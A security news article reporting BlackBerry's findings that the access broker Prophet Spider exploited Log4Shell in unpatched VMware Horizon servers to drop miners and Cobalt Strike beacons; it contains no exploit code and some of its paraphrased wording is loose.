Log4Shell Attacks on VMware Horizon Servers Involved an Initial Access Broker

Log4Shell Attacks on VMware Horizon Servers Involved an Initial Access Broker

Short News:-

An initial access broker group tracked as Prophet Spider has been linked to a set of malicious activities that exploit the Log4Shell vulnerability in unpatched VMware Horizon Servers. Blackberry observed instances of exploitation mirroring tactics, techniques, and procedures previously attributed to the Prophet Spider eCrime cartel. The Prophet Spider group has been active since at least May 2017. The group exploits Log4Shell flaws in Oracle WebLogic servers to gain access to target environments. Earlier this month, Microsoft called out a China-based operator for deploying a new ransomware strain on Horizon systems.

Detailed News:-

It has been linked to a set of malicious activities that exploit the Log4Shell vulnerability in unpatched VMware Horizon Servers. An access broker group called Prophet Spider has been linked to malicious activities.

According to new research from BlackBerry Research & Intelligence and Incident Response (IR) teams today, the cybercriminal has been taking advantage of a shortfall to download a second-stage payload onto the systems that have been targeted by the attack.

Among the payloads that have been found are cryptocurrency miners and Cobalt Strike Beacons. This is in line with a previous advisory from the U.K. National Health Service (NHS) that warned of active exploits of the vulnerabilities in VMware Horizon servers to drop malicious web shells and establish a foothold on affected networks for follow-on attacks.

Using the term "Log4Shell" to refer to a bug in the popular Apache Log4j library, you can get someone else to run your code by logging a specially crafted string. Since the flaw was made public last month, hackers have been quick to use it in a number of different intrusion campaigns to get full control of the servers that were affected by it.

BlackBerry said it saw tactics, techniques, and procedures (TTPs) that were similar to those used by the Prophet Spider eCrime cartel, such as the use of the "C:WindowsTemp7fde" folder path to store malicious files and the "wget.bin" executable to get more binaries, as well as the group's use of the same infrastructure.

The group "Prophet Spider" mostly gains access to victims by compromising vulnerable web servers, CrowdStrike said in August 2021, when the group was actively exploiting flaws in Oracle WebLogic servers to get into target environments. CrowdStrike said the group used a variety of low-prevalence tools to achieve its operational goals.

As with many other initial access brokers, the footholds are sold to the highest bidder on underground forums in the dark web. Then, the ransomware can be spread through them. He has been around at least since May 2017.

This isn't the first time Log4Shell flaws have been used to get into internet-facing systems running VMware Horizon. Microsoft called out a company in China called DEV-0401 earlier this month because they used a new ransomware strain called NightSky on the servers that had been hacked.

VMware has also asked its customers to apply the patches as soon as possible because of the attacks on Horizon servers. "The consequences of this vulnerability could be very bad for any system, especially ones that accept traffic from the open Internet," the virtualization service provider said.

This is a good sign that hackers are interested in exploiting a vulnerability that isn't very well known. Tony Lee, vice president of global services technical operations at BlackBerry, said.

"It's likely that criminal groups will keep looking into the Log4Shell vulnerability, so it's an attack method that defenders need to be on the lookout for," Lee said.